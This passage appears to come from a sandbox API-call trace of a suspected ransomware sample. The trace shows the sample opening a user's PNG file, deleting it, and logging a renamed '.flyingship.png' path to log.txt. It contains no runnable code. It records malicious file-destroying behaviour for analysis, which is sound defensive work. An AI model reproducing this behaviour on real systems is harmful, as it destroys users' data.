wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.401] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0190.401] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0190.401] FreeLibrary (hLibModule=0x75c90000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0190.402] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.402] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.402] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0190.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.403] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.404] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0190.404] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.404] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\x6gb.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x158 [0190.404] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.404] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.404] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.405] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0190.405] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.405] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.405] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.405] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.405] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.405] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.405] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.405] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0190.405] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.405] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.405] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.406] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.406] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", lpFilePart=0x0) returned 0x4d [0190.406] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9489db00, ftCreationTime.dwHighDateTime=0x1d5df5e, ftLastAccessTime.dwLowDateTime=0x82a6dc10, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x16b3e080, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa046, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="x6Gb.png", cAlternateFileName="")) returned 0x90af58 [0190.406] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\x6gb.png")) returned 1 [0190.408] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9489db00, ftCreationTime.dwHighDateTime=0x1d5df5e, ftLastAccessTime.dwLowDateTime=0x82a6dc10, ftLastAccessTime.dwHighDateTime=0x1d5dc77, ftLastWriteTime.dwLowDateTime=0x16b3e080, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xa046, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="x6Gb.png", cAlternateFileName="")) returned 0 [0190.408] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.411] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.411] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.411] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.411] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.411] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0190.411] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.411] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.411] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0190.412] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x2f58, lpOverlapped=0x0) returned 1 [0190.412] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0190.412] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x2f58, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.412] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0190.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.flyingship.png\r\n", cchWideChar=91, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 91 [0190.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5b) returned 0x9a5d10 [0190.412] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.flyingship.png\r\n", cchWideChar=91, lpMultiByteStr=0x9a5d10, cbMultiByte=91, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\x6Gb.flyingship.png\r\n", lpUsedDefaultChar=0x0) returned 91 [0190.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0190.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0190.412] WriteFile (in: hFile=0x158, lpBuffer=0x9a5de0*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5de0*, lpNumberOfBytesWritten=0x87f43c*=0x5a, lpOverlapped=0x0) returned 1 [0190.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0190.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.413] CloseHandle (hObject=0x158) returned 1 [0190.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.414] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0190.414] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.415] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0190.416] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.416] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.416] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0190.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.416] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0190.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: 